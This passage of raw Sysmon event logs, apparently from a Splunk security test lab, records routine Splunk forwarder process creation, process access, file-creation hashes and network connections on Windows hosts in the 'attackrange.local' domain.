Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.724{5EBD8912-8A62-6151-287A-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.245{5EBD8912-8A62-6151-277A-00000000FC01}4164024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.058{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A62-6151-277A-00000000FC01}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.058{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.058{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.058{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.058{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.058{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8A62-6151-277A-00000000FC01}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.058{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A62-6151-277A-00000000FC01}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.043{5EBD8912-8A62-6151-277A-00000000FC01}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.875{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B14E5172BA0D02911FC378840EF74422,SHA256=118099E01CAD8A1F14AADCD6B176B9898AA8D916F77181C862353D3685332FCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978435Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:55.454{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5033BEF45957205E8B0580DD7ECD6CD4,SHA256=0A69DE96AA08461DE2198BB67325224919C453F71EB2130FEF0DEF769C4E11D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.623{5EBD8912-8A63-6151-297A-00000000FC01}70966464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001049805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:53.780{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53338-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001049804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.427{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A63-6151-297A-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.423{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.423{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.423{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.423{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.423{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8A63-6151-297A-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.422{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A63-6151-297A-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.408{5EBD8912-8A63-6151-297A-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:55.045{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A1F1FA2187EA286370FD02E580CE393,SHA256=7B056103555306F1DD43C488FA3CB3FDE7F372364385F396D98DBCDBCADFF02D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978434Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:55.220{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0136DF7FEC25E31C5A5018DBAED4DD3C,SHA256=29313EE616DFD5D21636CF7C1459E05444ECDDDEC2CD2BAEC1FB745A52FE7880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:56.891{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55C4DC36F5862C799CF53F69E54A93FA,SHA256=F3D429B3A0D1ACD3A31B1C65BB2B9BD32F20E37CD704A2A6B15D436A7CB46B43,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978437Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:52.521{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54895-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978436Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:56.470{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=730C2F533F514E729ADDA141C89CF324,SHA256=B6942528C88E7217CF6DA7E8465680B8DF79F524499BDE4571D24DE440D92469,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:56.426{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78286D4847BC532D918DE6990B2D126F,SHA256=E2A2A3412DE7CC0E02A096F7405270ACD3A760298AB13135DEB7EA334DCD35C8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:56.126{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A64-6151-2A7A-00000000FC01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:56.124{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:56.124{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:56.124{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 